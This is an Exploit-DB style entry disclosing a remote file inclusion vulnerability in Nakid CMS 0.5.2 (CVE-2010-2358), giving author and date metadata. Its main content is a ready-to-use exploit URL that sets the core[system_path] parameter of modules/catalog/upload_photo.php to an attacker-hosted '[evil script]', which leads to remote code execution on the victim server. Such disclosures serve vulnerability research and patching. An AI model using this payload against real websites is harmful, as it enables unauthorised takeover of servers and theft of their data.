Nakid CMS 0.5.2 - Remote File Inclusion Exploit

EDB-ID: 13889 CVE: 2010-2358 OSVDB-ID: 65543
Verified: Author: sh00t0ut Published: 2010-06-16
Download Exploit: Source Raw Download Vulnerable App:
[~] Nakid CMS 0.5.2 Remote Include Exploit
[~] Found by sh00t0ut
[~] Expl: http://[victim]/modules/catalog/upload_photo.php?core[system_path]=[evil script]